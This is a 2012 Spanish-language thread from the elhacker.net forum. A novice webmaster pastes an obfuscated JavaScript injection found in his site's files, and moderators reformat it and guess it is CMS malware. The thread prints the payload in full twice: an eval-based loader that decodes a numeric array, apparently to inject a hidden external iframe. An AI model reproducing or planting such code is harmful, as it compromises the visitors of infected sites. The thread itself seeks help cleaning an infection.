elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


+  Foro de elhacker.net
|-+  Programación
| |-+  Desarrollo Web
| | |-+  PHP (Moderador: #!drvy)
| | | |-+  Problema con script en php.
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Problema con script en php.  (Leído 2,094 veces)
calvin2sr

Desconectado Desconectado

Mensajes: 16


Ver Perfil
Problema con script en php.
« en: 21 Noviembre 2012, 14:50 pm »

Hola:
Soy novato en esto del desarrollo web y tengo una pagina web. Sin embargo desde hace ayer no me iba. He mirado en donde estaba el error y me he encontrado en que en varios archivos este script:
<!--fff309--><script type="text/javascript" language="javascript" >lo que sea</script>
me aparece todo esto:
try{if(window.document)window["document"]["body"]="vasasf"}catch(bawetawe){if(window.document){v=wi ndow;try{fawbe--}catch(afnwenew){try{(v+v)()}catch(gngrthn){try{if (020===0x10)v["document"]["bo"+"dy"]="123"}catch(gfdnfdgber){m=123;if((alert+"").index Of("n"+"a"+"ti"+"ve")!==-1)ev=window["eval"];}}n=["1f","42","4h","4a","3o","4g","45","4b","4a","17", "1f","1g","17","4n","d","a","17","17","17","17","4 i","3m","4e","17","3m","4b","3m","17","2b","17","4 0","4b","3o","4h","49","41","4a","4g","1l","3o","4 e","41","3m","4g","41","2j","48","41","49","41","4 a","4g","1f","1e","45","42","4e","3m","49","41","1 e","1g","29","d","a","d","a","17","17","17","17"," 3m","4b","3m","1l","4f","4e","3o","17","2b","17"," 1e","44","4g","4g","4c","28","1m","1m","3m","4i"," 3o","4b","48","4b","4e","1l","3o","44","1m","35"," 41","4e","4f","4b","4a","3m","48","41","1m","3o"," 4a","4g","1l","4c","44","4c","1e","29","d","a","17 ","17","17","17","3m","4b","3m","1l","4f","4g","4l ","48","41","1l","4c","4b","4f","45","4g","45","4b ","4a","17","2b","17","1e","3m","3n","4f","4b","48 ","4h","4g","41","1e","29","d","a","17","17","17", "17","3m","4b","3m","1l","4f","4g","4l","48","41", "1l","3n","4b","4e","40","41","4e","17","2b","17", "1e","1n","1e","29","d","a","17","17","17","17","3 m","4b","3m","1l","4f","4g","4l","48","41","1l","4 4","41","45","43","44","4g","17","2b","17","1e","1 o","4c","4k","1e","29","d","a","17","17","17","17" ,"3m","4b","3m","1l","4f","4g","4l","48","41","1l" ,"4j","45","40","4g","44","17","2b","17","1e","1o" ,"4c","4k","1e","29","d","a","17","17","17","17"," 3m","4b","3m","1l","4f","4g","4l","48","41","1l"," 48","41","42","4g","17","2b","17","1e","1o","4c"," 4k","1e","29","d","a","17","17","17","17","3m","4b ","3m","1l","4f","4g","4l","48","41","1l","4g","4b ","4c","17","2b","17","1e","1o","4c","4k","1e","29 ","d","a","d","a","17","17","17","17","45","42","1 7","1f","18","40","4b","3o","4h","49","41","4a","4 g","1l","43","41","4g","2j","48","41","49","41","4 a","4g","2g","4l","2n","40","1f","1e","3m","4b","3 m","1e","1g","1g","17","4n","d","a","17","17","17" ,"17","17","17","17","17","40","4b","3o","4h","49" ,"41","4a","4g","1l","4j","4e","45","4g","41","1f" ,"1e","2a","40","45","4i","17","45","40","2b","3h" ,"1e","3m","4b","3m","3h","1e","2c","2a","1m","40" ,"45","4i","2c","1e","1g","29","d","a","17","17"," 17","17","17","17","17","17","40","4b","3o","4h"," 49","41","4a","4g","1l","43","41","4g","2j","48"," 41","49","41","4a","4g","2g","4l","2n","40","1f"," 1e","3m","4b","3m","1e","1g","1l","3m","4c","4c"," 41","4a","40","2h","44","45","48","40","1f","3m"," 4b","3m","1g","29","d","a","17","17","17","17","50 ","d","a","50","1g","1f","1g","29"];h=2;s="";if(m)for(i=0;i-473!=0;i++){k=i;if(window["document"])s+=String.fromCharCode(parseInt(n,25));}z=s;if(v)ev(z)}}}</script><!--/fff309-->

Me podeis decir que es esto? no soy muy entendido.
Muchas gracias y perdonad las molestias.


En línea

#!drvy
Moderador
***
Desconectado Desconectado

Mensajes: 5.850



Ver Perfil WWW
Re: Problema con script en php.
« Respuesta #1 en: 21 Noviembre 2012, 14:58 pm »

Parece ser que es parte o de Joomla o de algún tipo de malware que ha afectado a dicho CMS.

Razon:
Código
  1. https://www.google.com/search?q=1f%22%2C%221g%22%2C%2217%22%2C%224n%22%2C%22d%22%2C%22a%22%2C%2217%22
Saludos


En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.723


<3


Ver Perfil WWW
Re: Problema con script en php.
« Respuesta #2 en: 22 Noviembre 2012, 20:44 pm »

Código
  1. try {
  2.    if (window.document) window["document"]["body"] = "vasasf"
  3. } catch (bawetawe) {
  4.    if (window.document) {
  5.        v = wi ndow;
  6.        try {
  7.            fawbe--
  8.        } catch (afnwenew) {
  9.            try {
  10.                (v + v)()
  11.            } catch (gngrthn) {
  12.                try {
  13.                    if (020 === 0x10) v["document"]["bo" + "dy"] = "123"
  14.                } catch (gfdnfdgber) {
  15.                    m = 123;
  16.                    if ((alert + "").index Of("n" + "a" + "ti" + "ve") !== -1) ev = window["eval"];
  17.                }
  18.            }
  19.            n = ["1f", "42", "4h", "4a", "3o", "4g", "45", "4b", "4a", "17", "1f", "1g", "17", "4n", "d", "a", "17", "17", "17", "17", "4 i", "3m", "4e", "17", "3m", "4b", "3m", "17", "2b", "17", "4 0", "4b", "3o", "4h", "49", "41", "4a", "4g", "1l", "3o", "4 e", "41", "3m", "4g", "41", "2j", "48", "41", "49", "41", "4 a", "4g", "1f", "1e", "45", "42", "4e", "3m", "49", "41", "1 e", "1g", "29", "d", "a", "d", "a", "17", "17", "17", "17", " 3m", "4b", "3m", "1l", "4f", "4e", "3o", "17", "2b", "17", " 1e", "44", "4g", "4g", "4c", "28", "1m", "1m", "3m", "4i", " 3o", "4b", "48", "4b", "4e", "1l", "3o", "44", "1m", "35", " 41", "4e", "4f", "4b", "4a", "3m", "48", "41", "1m", "3o", " 4a", "4g", "1l", "4c", "44", "4c", "1e", "29", "d", "a", "17 ", "17", "17", "17", "3m", "4b", "3m", "1l", "4f", "4g", "4l ", "48", "41", "1l", "4c", "4b", "4f", "45", "4g", "45", "4b ", "4a", "17", "2b", "17", "1e", "3m", "3n", "4f", "4b", "48 ", "4h", "4g", "41", "1e", "29", "d", "a", "17", "17", "17", "17", "3m", "4b", "3m", "1l", "4f", "4g", "4l", "48", "41", "1l", "3n", "4b", "4e", "40", "41", "4e", "17", "2b", "17", "1e", "1n", "1e", "29", "d", "a", "17", "17", "17", "17", "3 m", "4b", "3m", "1l", "4f", "4g", "4l", "48", "41", "1l", "4 4", "41", "45", "43", "44", "4g", "17", "2b", "17", "1e", "1 o", "4c", "4k", "1e", "29", "d", "a", "17", "17", "17", "17", "3m", "4b", "3m", "1l", "4f", "4g", "4l", "48", "41", "1l", "4j", "45", "40", "4g", "44", "17", "2b", "17", "1e", "1o", "4c", "4k", "1e", "29", "d", "a", "17", "17", "17", "17", " 3m", "4b", "3m", "1l", "4f", "4g", "4l", "48", "41", "1l", " 48", "41", "42", "4g", "17", "2b", "17", "1e", "1o", "4c", " 4k", "1e", "29", "d", "a", "17", "17", "17", "17", "3m", "4b ", "3m", "1l", "4f", "4g", "4l", "48", "41", "1l", "4g", "4b ", "4c", "17", "2b", "17", "1e", "1o", "4c", "4k", "1e", "29 ", "d", "a", "d", "a", "17", "17", "17", "17", "45", "42", "1 7", "1f", "18", "40", "4b", "3o", "4h", "49", "41", "4a", "4 g", "1l", "43", "41", "4g", "2j", "48", "41", "49", "41", "4 a", "4g", "2g", "4l", "2n", "40", "1f", "1e", "3m", "4b", "3 m", "1e", "1g", "1g", "17", "4n", "d", "a", "17", "17", "17", "17", "17", "17", "17", "17", "40", "4b", "3o", "4h", "49", "41", "4a", "4g", "1l", "4j", "4e", "45", "4g", "41", "1f", "1e", "2a", "40", "45", "4i", "17", "45", "40", "2b", "3h", "1e", "3m", "4b", "3m", "3h", "1e", "2c", "2a", "1m", "40", "45", "4i", "2c", "1e", "1g", "29", "d", "a", "17", "17", " 17", "17", "17", "17", "17", "17", "40", "4b", "3o", "4h", " 49", "41", "4a", "4g", "1l", "43", "41", "4g", "2j", "48", " 41", "49", "41", "4a", "4g", "2g", "4l", "2n", "40", "1f", " 1e", "3m", "4b", "3m", "1e", "1g", "1l", "3m", "4c", "4c", " 41", "4a", "40", "2h", "44", "45", "48", "40", "1f", "3m", " 4b", "3m", "1g", "29", "d", "a", "17", "17", "17", "17", "50 ", "d", "a", "50", "1g", "1f", "1g", "29"];
  20.            h = 2;
  21.            s = "";
  22.            if (m) for (i = 0; i - 473 != 0; i++) {
  23.                k = i;
  24.                if (window["document"]) s += String.fromCharCode(parseInt(n, 25));
  25.            }
  26.            z = s;
  27.            if (v) ev(z)
  28.        }
  29.    }
  30. }

Dame unas horas que cuando salga de trabajar miraré a ver que puede ser,
En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
itsukisekaiakiba

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Re: Problema con script en php.
« Respuesta #3 en: 22 Noviembre 2012, 21:05 pm »

puedes xecar si algun nombre que pides esta mal escrito o tiene espacios de mas puede ser.. no es mucho pero espero ser de utilidad

v = wi ndow;
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Problema con script... #!/usr/bin/php5-cgi -q
PHP
ZyrroX 1 1,576 Último mensaje 7 Abril 2007, 05:56 am
por дٳŦ٭
Problema Action Script
Diseño Gráfico
Riki_89D 1 3,698 Último mensaje 23 Diciembre 2009, 01:02 am
por raul338
[Problema]Con script en perl. « 1 2 »
Scripting
PHAMTOM 10 6,442 Último mensaje 8 Marzo 2010, 21:26 pm
por ~ Yoya ~
problema con script en firefox
Software
Paul Young 1 1,910 Último mensaje 7 Mayo 2010, 12:57 pm
por Festor
Problema con script en rar
Scripting
Alex_san 1 1,776 Último mensaje 3 Abril 2013, 15:42 pm
por Eleкtro
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines